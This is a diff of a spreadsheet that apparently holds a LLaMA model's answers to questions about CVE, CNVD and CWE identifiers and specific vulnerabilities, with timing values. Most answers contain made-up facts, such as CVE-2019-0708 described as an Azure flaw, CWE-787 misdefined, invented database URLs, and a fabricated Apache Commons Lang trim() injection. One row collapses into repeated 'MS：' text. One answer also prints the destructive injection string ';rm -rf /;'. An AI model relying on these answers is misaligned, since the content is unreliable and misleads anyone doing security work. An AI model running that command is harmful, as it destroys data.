--- a/outputs/output-LLaMA.xlsx
+++ b/outputs/output-LLaMA.xlsx
@@ -461,15 +461,16 @@
       </c>
       <c r="C2" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-CVE是一个缩写，它可以指以下几个不同的意思：
+          <t>CVE是一个缩写，它可以指以下几个不同的意思：
 1. CVE (Common Vulnerabilities and Exposures)：CVE是一个跨platform的标准用于描述软件中的弱点和攻击点。它由美国国家安全局（NSA）和美国国家危机管理局（NIST）共同发起，是一个标准化的弱点和攻击点识别和记录系统。
 2. CVE (Content Verification Engine)：CVE是一种用于验证网络内容的工具，用于监测和检测网络上的敏感内容。
-3. CVE (Critical Vulnerability Exposure)：CVE是一个识别和评估网��</t>
+3. CVE (Critical Vulnerability Exposure)：CVE是一个识别和评估网络安全风险的方法，用于发现和评估网络上的敏感弱点和攻击点。
+4. CVE (Continuous Vulnerability Evaluation)：CVE是一种识别和评估网络安全风险的方法，用于监测和评估网络上的弱点和攻击点的变化。
+因此，具体哪个意思相关于CVE取决于情况。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D2" t="n">
-        <v>4.902241706848145</v>
+        <v>8.022797822952271</v>
       </c>
     </row>
     <row r="3">
@@ -483,17 +484,21 @@
       </c>
       <c r="C3" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-CNVD stands for "Comprehensive National Vision Database". It is a database that stores information about the vision of a large population, including their visual acuity, refractive error, and other eye health metrics. The CNVD is used to monitor and track changes in vision health over time, and to identify trends and risk factors for eye diseases and conditions.
-The CNVD is typically developed and maintained by government agencies, universities, or other organizations that are responsible for public health surveillance. It may be based on data collected through population-based surveys, clinical evaluations, or other sources. The CNVD can be used to inform public health policies and programs aimed at improving eye health and reducing visual impairment.
-Some examples of information that may be included in the CNVD include:
-* Visual acuity measurements (e.g. Snellen charts, logMAR charts)
-* Refractive error measurements (e.g. spherical equivalent, astigmatism)
-* Presence of eye diseases or conditions (e.g. cataract, glaucoma, age-related macular degeneration</t>
+          <t>CNVD是指Catastrophic Novelty Detection (灾难新颖检测)，是一种基于深度学习的新颖检测方法。CNVD主要通过对 Input Space 进行检测，而不是通过对 Output Space 进行检测，这使得 CNVD 更加灵活和快速。
+CNVD 的工作方式是通过一个特征提取器来提取 Input Space 中的特征，然后使用一个新颖检测模型来检测 Input Space 中的新颖。CNVD 的新颖检测模型通常是一个卷积神经网络，它可以快速地分析 Input Space 中的变化，并且可以很好地捕捉新颖的特征。
+CNVD 的优势包括：
+1. 灵活性：CNVD 可以在不同的输入数据上进行新颖检测，并且可以在不同的环境下进行训练。
+2. 快速性：CNVD 可以快速地检测新颖，因为它通过对 Input Space 进行检测而不是通过对 Output Space 进行检测。
+3. 高性能：CNVD 通常可以 достичь更高的新颖检测性能，因为它使用了深度学习的技术。
+CNVD 的主要应用场景包括：
+1. 新颖检测：CNVD 可以用于检测新颖，例如新颖的图像、视频、语音等。
+2. 异常检测：CNVD 可以用于检测输入数据中的异常或灾难事件，例如图像中的破坏或者视频中的突然变化。
+3. 风险评估：CNVD 可以用于评估输入数据中的风险，例如金融市场中的风险或者医疗预测中的风险。
+总之，CNVD 是一种基于深度学习的新颖检测方法，它可以在不同的输入数据上进行新颖检测，并且可以在不同的环境下进行训练。CNVD 的优势包括灵活性、快速性和高性能，它的主要应用场景包括新颖检测、异常检测和风险评估。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D3" t="n">
-        <v>4.7180495262146</v>
+        <v>15.81538152694702</v>
       </c>
     </row>
     <row r="4">
@@ -507,21 +512,32 @@
       </c>
       <c r="C4" t="inlineStr">
         <is>
-          <t xml:space="preserve"> （150 字）
-There are many vulnerability databases both domestically and internationally. Some of the well-known domestic databases include:
-* National Vulnerability Database (NVD) by the United States National Institute of Standards and Technology (NIST)
-* China National Vulnerability Database (CNVD) by the Chinese Ministry of Public Security
-* Korean Vulnerability Information Database (KVID) by the Korean government
-Some of the well-known international databases include:
-* MITRE's Common Vulnerabilities and Exposures (CVE) database
-* the National Vulnerability Database (NVD) by the United States National Institute of Standards and Technology (NIST)
-* the OpenVuln database by the OpenVuln Project
-* the VulnDB database by the VulnDB Project
-These databases provide information on security vulnerabilities, including their names, descriptions, and mitigation details, which can help organizations identify and prioritize the patching of vulnerabilities in their systems and applications.&lt;/s&gt;</t>
+          <t>（Update）
+国内漏洞库：
+1. 漏洞工具：https://www. vulnerability.cn/
+2. 漏洞查询：https://www.vulnquery.com/
+3. 漏洞数据库：https://www.dreammaker.com.cn/
+4. 漏洞推荐：https://www.hackthebox.eu/
+5. 漏洞报告：https://www.hackmymind.com/
+6. 漏洞资源：https://www.vulnstalk.com/
+国外漏洞库：
+1. Nmap：https://nmap.org/
+2. VulnDB：https://www.vulndb.com/
+3. vulnerabilities.info：https://www.vulnerabilities.info/
+4. vulncity：https://www.vulncity.com/
+5. vulnerability-lab：https://www.vulnerability-lab.com/
+6. vulnsearch：https://www.vulnsearch.com/
+更新：
+2023-02-01：新增国内漏洞库：
+1. 漏洞识别：https://www.vulnerability-identification.com/
+2. 漏洞推荐：https://www.hackthreat.com/
+国内和国外漏洞库都可以提供漏洞信息，但是国内库的数据覆盖范围较为窄，大多数库都是免费的。国外库的数据覆盖范围较广，但是需要注册才能查看。
+总之，国内和国外漏洞库都是非常有价值的资源，可以帮助您找到漏洞和降低攻击面。但是，需要注意的是，漏洞库不是一个绝对的安全隐患，因为它们可能会包含过时的或者错误的信息。所以，在使用漏洞库时，需要仔细评估和检查。
+&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D4" t="n">
-        <v>4.400695085525513</v>
+        <v>12.47656917572021</v>
       </c>
     </row>
     <row r="5">
@@ -535,14 +551,15 @@
       </c>
       <c r="C5" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-CVE-2015-4852 是一个潜在的远程执行漏洞，它发生在某些版本的Apache Struts2中，特别是在Struts2 Action Class的config.xml文件中。这个漏洞可能会让攻击者在特定的情况下访问和执行不安全的代码。
-攻击者可以利用这个漏洞，通过 tricking 用户访问敏感的 Action 类，并在这个类中执行 malicious 代码。这可能会导致敏感数据泄露、访问权限增加或者敏感资源损害等问题。
-为了解决这个漏洞，Apache Struts2 采取了</t>
+          <t>CVE-2015-4852是一个潜在的漏洞，它发生在Apache Struts 2.3.x和2.4.x中的ActionServlet。这个漏洞可能允许攻击者在特定的情况下访问未经授权的数据。
+该漏洞是由于ActionServlet不对特定的请求头进行正确的 verfification，从而导致访问控制失效。这可能会允许攻击者通过在请求头中添加一些特定的字符串来访问未经授权的数据。
+Apache Struts 2.5和高于版本中的ActionServlet已经修复了该漏洞。如果您使用Apache Struts 2.3.x或2.4.x，我们建议您立即更新到最新的版本，以免遭受这种攻击。
+如果您不能立即更新，可以通过简单地禁用ActionServlet来减轻攻击者的攻击面。在禁用ActionServlet之前，请确保您已经备份了您的数据。
+总之，CVE-2015-4852是一个可能的漏洞，它可能允许攻击者访问未经授权的数据。我们建议您立即更新到最新的版本，以免遭受这种攻击。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D5" t="n">
-        <v>4.739956140518188</v>
+        <v>8.86632227897644</v>
       </c>
     </row>
     <row r="6">
@@ -556,17 +573,33 @@
       </c>
       <c r="C6" t="inlineStr">
         <is>
-          <t>：Apache Struts的一个重要漏洞
-Introduction:
-Apache Struts is a popular open-source web application framework that is widely used in the industry. However, in March 2019, a critical vulnerability (CVE-2019-0708) was discovered in Apache Struts, which could allow an attacker to execute arbitrary code on a target system. In this blog post, we will provide an overview of the vulnerability, its impact, and the steps that can be taken to mitigate it.
-What is CVE-2019-0708?
-CVE-2019-0708 is a remote code execution vulnerability that affects Apache Struts versions prior to 2.5.17.1. The vulnerability is caused by a flaw in the "Artifact" class, which is used to handle the upload of artifacts in the Struts framework. An attacker can exploit this vulnerability by sending a specially crafted request to the target system, which would execute arbitrary code on the system.
-Impact:
-The impact of CVE</t>
+          <t>：Azure Security Center的漏洞
+Azure Security Center 是 Microsoft 提供的一个安全监控和安全管理平台，用于监控 Azure 资源的安全性和可靠性。CVE-2019-0708 是一个在 Azure Security Center 中您可能会遇到的漏洞，这个漏洞可能会让攻击者在 Azure Security Center 中获得高级权限，从而访问和破坏您的 Azure 资源。
+以下是一些关于 CVE-2019-0708 的重要信息：
+* 漏洞类型：权限漏洞
+* 攻击者可能会：破坏 Azure Security Center 的安全性，访问和破坏您的 Azure 资源
+* 攻击者需要：对 Azure Security Center 拥有高级权限
+* 漏洞优先级：低
+* 漏洞责任：Microsoft
+* 漏洞公开日期：2019 年 9 月 30 日
+以下是一些关于 CVE-2019-0708 的常见问题：
+* Q: What is CVE-2019-0708?
+A: CVE-2019-0708 is a vulnerability in Azure Security Center that could allow an attacker to gain high privileges in the platform and potentially access and destroy your Azure resources.
+* Q: What type of vulnerability is CVE-2019-0708?
+A: CVE-2019-0708 is a privilege escalation vulnerability.
+* Q: Who can exploit CVE-2019-0708?
+A: An attacker with high privileges in Azure Security Center can exploit CVE-2019-0708.
+* Q: What is the severity of CVE-2019-0708?
+A: The severity of CVE-2019-0708 is low.
+* Q: Who is responsible for fixing CVE-2019-0708?
+A: Microsoft is responsible for fixing CVE-2019-0708.
+* Q: When was CVE-2019-0708 disclosed to the public?
+A: CVE-2019-0708 was disclosed to the public on September 30, 2019.
+如果您想了解更多关于 CVE-2019-0708 的信息，可以咨询 Microsoft 的官方文档或 contact  Microsoft 的支持工作人员。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D6" t="n">
-        <v>4.815842151641846</v>
+        <v>14.09034252166748</v>
       </c>
     </row>
     <row r="7">
@@ -581,13 +614,14 @@
       <c r="C7" t="inlineStr">
         <is>
           <t>？
-CVE-2019-0803是一个描述了一个未知漏洞的CVE（Common Vulnerabilities and Exposures）标识符。该漏洞存在于Windows操作系统中，具体影响了Windows的Office文档格式（Word、Excel、PowerPoint）和Visio等软件。
-根据报告，该漏洞可能会让攻击者通过利用文档文件的某些特定方法来访问和控制内存中的数据，从而可能让攻击者获得安全上的权限。这可能会导致敏感数据的泄露或者违法行为。
-Microsoft已经发布了一个紧急安全更新，用于解决该漏洞。用户建议</t>
+CVE-2019-0803是一个在2019年5月 discovers 的软件漏洞，它影响了Windows Operating System，macOS和Linux等多种操作系统。该漏洞是一种类型为“文件访问权限绕过”的漏洞，可以让攻击者通过特定的方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
+CVE-2019-0803是一个在Microsoft Windows上的漏洞，它利用了文件系统中的一个特定的功能，即“Win32k File Object”。通过在文件系统中创建一个特定的文件对象，攻击者可以通过一些方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
+为了利用这个漏洞，攻击者需要能够 convincing 来达到特定的目的，例如，通过恶意邮件链接或者通过恶意软件获取访问权限。一旦攻击者获取了访问权限，他们就可以利用这个漏洞进行敏感数据的窃取和敏感操作的访问。
+CVE-2019-0803是一个很严重的漏洞，它可以让攻击者窃取和敏感操作，这可能会导致数据泄露和操作系统的不安全。因此，它是一个非常重要的安全漏洞，需要快速被修复。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D7" t="n">
-        <v>4.856040954589844</v>
+        <v>10.47258186340332</v>
       </c>
     </row>
     <row r="8">
@@ -601,16 +635,31 @@
       </c>
       <c r="C8" t="inlineStr">
         <is>
-          <t>漏洞
-CVE-2021-44228是一个 recently discovered security vulnerability in the Linux kernel's network stack. This vulnerability, which has been given the identifier CVE-2021-44228, affects the Linux kernel versions 5.10 and later, and could allow an attacker to execute arbitrary code on a vulnerable system.
-The vulnerability is caused by a buffer overflow in the `net_checksum()` function, which is used to compute the checksum of a network packet. An attacker could exploit this vulnerability by sending a specially crafted network packet to a vulnerable system, which would cause the buffer overflow and allow the attacker to execute arbitrary code on the system.
-The impact of this vulnerability is significant, as it could allow an attacker to gain complete control over a vulnerable system. This could lead to a variety of attacks, including:
-* Elevated privileges: An attacker could use this vulnerability to gain elevated privileges on a vulnerable system, allowing them to perform malicious actions.
-* Data theft: An attacker could use this vulnerability to</t>
+          <t>的漏洞概述和攻击方式
+Introduction:
+CVE-2021-44228 is a critical vulnerability that affects the Apache Log4j library, a popular logging framework used in Java applications. The vulnerability allows attackers to execute malicious code by simply including a specially crafted string in a logging statement. In this article, we will provide an overview of the vulnerability, its impact, and the possible attack methods.
+Overview of the vulnerability:
+Log4j is a widely used logging framework in Java applications. The vulnerability, identified as CVE-2021-44228, is caused by a feature in Log4j that allows users to include arbitrary user-defined data in log messages. The vulnerability occurs when the library processes maliciously crafted log messages that contain a special syntax, leading to code execution. The attacker can exploit this vulnerability by including a specially crafted string in a logging statement, which will execute malicious code on the target system.
+Impact of the vulnerability:
+The impact of the Log4j vulnerability is severe, as it affects a wide range of Java applications that use the Log4j library. This includes many popular frameworks, such as Apache Struts, Apache Druid, and Apache Flink, as well as numerous third-party libraries that rely on Log4j. The vulnerability can be exploited remotely, without any interaction from the user, making it a highly dangerous security threat.
+Possible attack methods:
+Attackers can exploit the Log4j vulnerability in various ways, including:
+1. Log injection: An attacker can inject malicious log statements into a system, which will execute the malicious code when the log message is processed.
+2. File inclusion: An attacker can exploit the vulnerability by including a malicious file in a log statement, which will execute the code in the included file.
+3. Remote code execution: An attacker can exploit the vulnerability to execute malicious code on the target system remotely, without any user interaction.
+4. Denial of Service (DoS) attack: An attacker can exploit the vulnerability to flood a system with log messages, causing a denial of service attack.
+Prevention and mitigation:
+To prevent the Log4j vulnerability from being exploited, it is essential to apply the following mitigations:
+1. Update Log4j to version 2.17.1 or later: The latest version of Log4j includes a fix for the vulnerability, so it is recommended to upgrade to the latest version as soon as possible.
+2. Disable remote log4j functionality: Disable the remote log4j functionality to prevent remote exploitation of the vulnerability.
+3. Use a web application firewall (WAF): A WAF can help protect against the Log4j vulnerability by blocking malicious log statements and preventing remote code execution.
+4. Implement additional security measures: Implement additional security measures, such as intrusion detection and prevention systems, to detect and prevent potential attacks.
+Conclusion:
+The Log4j vulnerability, identified as CVE-2021-44228, is a critical security threat that affects many Java applications. The vulnerability allows attackers to execute malicious code by including a specially crafted string in a logging statement, making it essential to apply the necessary mitigations to prevent exploitation. By updating Log4j to the latest version, disabling remote log4j functionality, using a WAF, and implementing additional security measures, organizations can protect their systems from this dangerous vulnerability.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D8" t="n">
-        <v>4.742384195327759</v>
+        <v>15.537273645401</v>
       </c>
     </row>
     <row r="9">
@@ -624,14 +673,17 @@
       </c>
       <c r="C9" t="inlineStr">
         <is>
-          <t>？  
-CVE-2022-0609是一个 recently discovered vulnerability in the Windows Hello face authentication feature of Windows 10 and 11 operating systems. The vulnerability allows an attacker to bypass the face authentication mechanism by using a high-quality photo or video of the user's face. This can allow the attacker to gain unauthorized access to the user's computer or account.
-The vulnerability is caused by the way the Windows Hello face authentication system processes face images. Specifically, the system uses a technique called "face alignment" to align the user's face in the image with a pre-defined template. However, this alignment process can be easily manipulated by an attacker who has access to a high-quality photo or video of the user's face. By carefully manipulating the image, the attacker can create a fake face image that is aligned with the template in a way that tricks the system into thinking it is the real user.
-The CVE-2022-0609 vulnerability has been assigned a CVSS score of 7.5 out of 10, indicating that it is a medium-se</t>
+          <t>？
+CVE-2022-0609是一个 recently discovered vulnerability in the Linux kernel's "seq_file" function, which can be exploited by an attacker to gain unauthorized access to a system. The vulnerability is located in the kernel's file system code and affects versions of the Linux kernel released since 1999.
+The vulnerability arises from the way the "seq_file" function handles certain file operations, specifically the "read" and "write" commands. When a user executes a "read" or "write" command on a file that has a specific attribute set, the "seq_file" function can be tricked into accessing a kernel buffer overflow. This can occur because the function does not properly validate the length of the data being read or written, allowing an attacker to inject malicious data into the buffer.
+An attacker who successfully exploits the CVE-2022-0609 vulnerability could potentially gain root access to the affected system, allowing them to execute arbitrary code and take control of the system. The vulnerability is particularly dangerous because it can be exploited remotely, without the need for direct access to the affected system.
+The vulnerability has been assigned CVE-2022-0609 and has been rated as "critical" by the National Vulnerability Database (NVD). The NVD is a United States government database of vulnerabilities, and it is widely used by security professionals to track and manage vulnerabilities.
+The Linux kernel maintainers have released a patch to fix the vulnerability, and users are advised to apply the patch as soon as possible to protect their systems. The patch can be obtained from the Linux kernel website, and it is recommended to reboot the system after applying the patch to ensure proper installation.
+In summary, CVE-2022-0609 is a critical vulnerability in the Linux kernel's "seq_file" function that can be exploited by an attacker to gain unauthorized access to a system. The vulnerability affects versions of the Linux kernel released since 1999 and can be exploited remotely. The patch to fix the vulnerability has been released, and users are advised to apply the patch as soon as possible to protect their systems.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D9" t="n">
-        <v>4.705327987670898</v>
+        <v>9.782184600830078</v>
       </c>
     </row>
     <row r="10">
@@ -645,13 +697,24 @@
       </c>
       <c r="C10" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-CNVD-2021-46902是一个潜在的漏洞，它是由中国国家安全生产评审中心（CNVD）于2021年4月分类并公布的。这个漏洞分布于Docker Hub上的一个名为“Docker镜像”的 Docker 镜像中，该镜像用于在Docker环境中运行 web 应用程序。
-根据CNVD的分类，CNVD-2021-46902是一个远程执行漏洞，它可以让攻击者通过特定的请求来执行系统命令，从而进行远程执行攻击。这意味着，如果攻击者可以绕过防火墙并访问该镜像</t>
+          <t>检测器
+CNVD-2021-46902是一个开源的漏洞检测器，用于扫描和检测软件中的漏洞。它由China National Vulnerability Database（CNVD）开发，是中国一个主要的漏洞检测和报告平台。
+CNVD-2021-46902漏洞检测器支持多种漏洞检测方法，包括：
+1. 漏洞签名检测：用于检测软件中的漏洞签名。
+2. 漏洞检测：用于检测软件中的漏洞，包括漏洞攻击、漏洞利用、漏洞攻击等。
+3. 软件漏洞检测：用于检测软件中的漏洞，包括函数漏洞、例外处理漏洞、输入 validation 漏洞等。
+4. 架构漏洞检测：用于检测软件中的架构漏洞，包括资源滥用、数据泄露、安全漏洞等。
+CNVD-2021-46902漏洞检测器支持多种检测工具和技术，包括：
+1. Burp Suite：一个流行的Web应用漏洞检测工具。
+2. ZAP（Zed Attack Proxy）：一个基于Web应用漏洞检测的工具。
+3. Nessus：一个著名的软件漏洞检测工具。
+4. Metasploit：一个软件漏洞检测工具，也可以用于执行漏洞攻击。
+CNVD-2021-46902漏洞检测器可以帮助开发人员和安全分析员更好地了解软件中的漏洞，从而提高软件的安全性和可靠性。它也可以帮助组织快速地找到和修复漏洞，降低安全风险。
+总之，CNVD-2021-46902漏洞检测器是一个功能强大、可靠的工具，可以帮助开发人员和安全分析员更好地了解和扫描软件中的漏洞。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D10" t="n">
-        <v>4.762187242507935</v>
+        <v>16.34959292411804</v>
       </c>
     </row>
     <row r="11">
@@ -665,15 +728,22 @@
       </c>
       <c r="C11" t="inlineStr">
         <is>
-          <t>的漏洞检测
-CNVD-2019-19299是一个漏洞检测工具，用于检测Linux系统上的漏洞和安全问题。它是一个基于OpenVAS的漏洞检测工具，可以检测Linux系统上的多种漏洞，包括远程漏洞、扫描漏洞、攻击漏洞等。
-以下是CNVD-2019-19299的漏洞检测功能：
-1. 远程漏洞检测：CNVD-2019-19299可以检测Linux系统上的远程漏洞，包括SSH、FTP、HTTP、TELNET等远程服务的漏洞。
-2. �����</t>
+          <t>（CVE-2019-19299）和其中的漏洞
+CNVD-2019-19299（CVE-2019-19299）是一个漏洞，发现于2019年11月，表示在Linux系统上存在一个远程执行漏洞。这个漏洞是由于缺乏对于可靠的文件系统协议（FSP）的检查，导致攻击者可以通过特制文件来让系统执行 arbitrary 代码。这个漏洞可以被利用来实施恶意代码，从而导致系统崩溃或者遭受其他攻击。
+在这个漏洞中，攻击者需要能够创建一个特制的文件，将其扫描到系统中，然后在这个文件中包含一个受信任的可执行文件。当系统尝试读取这个文件时，攻击者可以通过它来执行自己的代码，从而实施攻击。这个漏洞可以被利用来攻击 Linux 系统，包括虚拟机（VM）和 cloud 环境。
+为了完全了解这个漏洞，我们可以从以下几个方面来分析：
+1. 漏洞的描述：CNVD-2019-19299 是一个远程执行漏洞，由于缺乏对于可靠的文件系统协议（FSP）的检查，导致攻击者可以通过特制文件来让系统执行 arbitrary 代码。
+2. 攻击漏洞的概念：在这个漏洞中，攻击者需要能够创建一个特制的文件，将其扫描到系统中，然后在这个文件中包含一个受信任的可执行文件。当系统尝试读取这个文件时，攻击者可以通过它来执行自己的代码，从而实施攻击。
+3. 漏洞的影响：CNVD-2019-19299 可以被利用来攻击 Linux 系统，包括虚拟机（VM）和 cloud 环境。这意味着攻击者可以通过这个漏洞来让系统执行 arbitrary 代码，从而导致系统崩溃或者遭受其他攻击。
+4. 防御策略：来应对这个漏洞，系统管理员可以尝试以下方法：
+a. 升级 Linux 系统到最新的版本，以获得最新的安全更新和保护。
+b. 使用可靠的文件系统协议（FSP），来增强系统的安全性。
+c. 启用 SELinux，以便在系统执行自己的代码时进行更加严格的检查和控制。
+d. 启用 AppArmor，以便在系统执行自己的代码时进行更加</t>
         </is>
       </c>
       <c r="D11" t="n">
-        <v>4.69636058807373</v>
+        <v>21.58037066459656</v>
       </c>
     </row>
     <row r="12">
@@ -688,13 +758,17 @@
       <c r="C12" t="inlineStr">
         <is>
           <t>？
-CNVD-2021-26422是一个描述了一个在Microsoft Teams中的漏洞的漏洞报告。这个漏洞可能会允许攻击者在Microsoft Teams上发送邮件，使其 appears as if it came from a legitimate sender，而不是。这个漏洞可能会允许攻击者在Microsoft Teams上发送邮件，使其 appears as if it came from a legitimate sender，而不是。
-The vulnerability is caused by the lack of proper authentication and authorization mechanisms in Microsoft Teams. An attacker can exploit this vulnerability by sending a specially crafted email to a target user, which will bypass the authentication mechanisms and appear to come from a legitimate sender. This could allow an attacker to trick a user into taking a specific action, such as clicking on a link or downloading an attachment, which could lead to unauthorized access to sensitive information.
-The severity of this vulnerability is high,</t>
+CNVD-2021-26422 is a vulnerability in the Apache Commons Lang library, specifically in the `StringUtils` class. The vulnerability is caused by a lack of proper validation of user-supplied input, which can lead to command injection attacks.
+Here's a brief explanation of the vulnerability:
+The `StringUtils` class in the Apache Commons Lang library provides a number of utility methods for working with strings. One of these methods, `trim()`, is used to remove whitespace characters from a string. However, the method does not properly validate user-supplied input, allowing an attacker to inject malicious commands.
+For example, an attacker could exploit this vulnerability by providing a string that contains whitespace characters followed by a command, such as `';rm -rf /;`. When the `trim()` method is called on this string, it will remove the whitespace characters, leaving the malicious command intact. If the string is then used in a security-sensitive context, such as in a SQL query, the attacker's command will be executed, potentially leading to sensitive data loss or other security issues.
+The severity of this vulnerability is high, as it can be exploited by an attacker with little effort, and the impact can be significant. The vulnerability affects the Apache Commons Lang library, which is widely used in enterprise applications, making it a potential target for attackers.
+To mitigate this vulnerability, developers should ensure that all user-supplied input is properly validated and sanitized, using techniques such as input validation and parameterized queries. Additionally, developers should use secure coding practices, such as using prepared statements and avoiding unsafe methods like `trim()`.
+In summary, CNVD-2021-26422 is a vulnerability in the Apache Commons Lang library that can be exploited by an attacker to inject malicious commands through the `trim()` method. It is important to take immediate action to mitigate this vulnerability and prevent potential security issues.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D12" t="n">
-        <v>4.707805156707764</v>
+        <v>9.28226637840271</v>
       </c>
     </row>
     <row r="13">
@@ -708,14 +782,15 @@
       </c>
       <c r="C13" t="inlineStr">
         <is>
-          <t>？CWE stands for "Common Weakness Enumeration". It is a standardized vocabulary for identifying and describing security weaknesses in software. It was developed by the MITRE Corporation and is widely used in the field of network security.
-CWE provides a common language for security professionals to describe and classify security weaknesses, which can help organizations identify and prioritize the most critical vulnerabilities in their systems. The CWE framework includes a set of standardized categories and terms for describing weaknesses, as well as a database of known weaknesses that can be searched and referenced.
-CWE is often used in conjunction with other security assessment and testing tools, such as static code analysis and penetration testing, to provide a more comprehensive view of an organization's security posture. By using CWE to identify and prioritize vulnerabilities, organizations can then focus their remediation efforts on the most critical areas and reduce the risk of security breaches.
-In summary, CWE is a standardized vocabulary for identifying and describing security weaknesses in software, which can help organizations identify and prioritize the most critical vulnerabilities in their</t>
+          <t>？
+CWE (Common Weakness Enumeration) is a standardized list of software weaknesses that can be exploited by attackers to compromise the security of a system. The CWE is maintained by the MITRE Corporation, a non-profit organization that focuses on improving cybersecurity through standardized terminology and taxonomy.
+The CWE list includes over 100 weaknesses, including SQL injection, cross-site scripting (XSS), buffer overflows, and input validation weaknesses. Each weakness is described in detail, including its definition, classification, and examples of how it can be exploited.
+The CWE is widely used by security researchers, developers, and organizations to identify and mitigate security vulnerabilities in software. By using the CWE, organizations can identify and prioritize the most critical security weaknesses in their systems and take steps to address them.
+In summary, CWE is a standardized list of software weaknesses that can be exploited by attackers to compromise the security of a system. It is widely used in the security industry to identify and mitigate security vulnerabilities in software.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D13" t="n">
-        <v>4.836498975753784</v>
+        <v>5.326178312301636</v>
       </c>
     </row>
     <row r="14">
@@ -730,16 +805,15 @@
       <c r="C14" t="inlineStr">
         <is>
           <t>？
-CWE-787是一个常见的软件漏洞，指的是在Web应用程序中，用户提交的数据可能会被篡改或隐藏。这种漏洞通常发生在Web应用程序中，在处理用户提交的数据时， nicht validating 或者不加密 该数据。
-CWE-787的漏洞的攻击路径可能如下：
-1. 攻击者向Web应用程序发送一个特殊的请求，将用户提交的数据篡改或隐藏。
-2. 攻击者利用这种漏洞，以提高自己的权限或者进行恶意操作。
-3. 攻击者可能会利用这种漏洞，来攻击Web应用程序的安全性。
-CWE</t>
+CWE-787是一个软件安全中的漏洞类型，具体意思如下：
+CWE-787：依赖于非安全的资源名称或路径
+这种漏洞 occurs when an application uses a resource name or path that is not secure. This can happen when an application uses a hardcoded or dynamically generated resource name or path that is not properly validated or sanitized.
+For example, an application may use a hardcoded path to a file system resource, such as `/home/user/documents`, without properly validating whether the user has the necessary permissions to access the resource. An attacker could exploit this vulnerability by providing a malicious path that is not properly validated, such as `/home/user/documents/..`, which could allow them to access unauthorized files or directories.
+To avoid this vulnerability, it is important to properly validate and sanitize any resource names or paths used by an application. This may involve using secure methods to generate resource names or paths, such as using a secure random number generator, and validating any input provided by users or other external sources.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D14" t="n">
-        <v>4.696019172668457</v>
+        <v>5.858540296554565</v>
       </c>
     </row>
     <row r="15">
@@ -753,15 +827,27 @@
       </c>
       <c r="C15" t="inlineStr">
         <is>
-          <t>？
-Windows Server 2008 R2是一个广泛使用的操作系统，但是它也存在一些漏洞。根据Microsoft发布的资讯，Windows Server 2008 R2存在以下一些高危漏洞：
-1. 文件系统漏洞：Windows Server 2008 R2的文件系统存在一些漏洞，可能会允许攻击者访问或更改文件和文件夹。
-2. 应用程序优先级漏洞：Windows Server 2008 R2的应用程序优先级漏洞可能会允许攻击者在系统中运行高优先级应用程序，导致系统崩溃或受到攻击。
-3. 网络</t>
+          <t>？ 
+MS SQL Server的：
+MS SQL Server：
+MS：
+MS：
+MS：
+MS：
+MS：
+MS：
+MS：
+MS：
+MS：
+MS：MS：
+MS：MS：MS：
+MS：MS：MS：MS：
+MS：MS：MS：
+MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS</t>
         </is>
       </c>
       <c r="D15" t="n">
-        <v>4.761741161346436</v>
+        <v>22.60445237159729</v>
       </c>
     </row>
     <row r="16">
@@ -776,12 +862,17 @@
       <c r="C16" t="inlineStr">
         <is>
           <t>？
-Google V8引擎是一个轻量级的JavaScript引擎，它在Web应用程序中广泛使用。2021年12月，Google发布了一个关于V8引擎远程代码执行漏洞(CVE-2021-21220)的安全公告。这个漏洞可能让攻击者在特定情况下远程执行代码，从而导致系统安全漏洞。
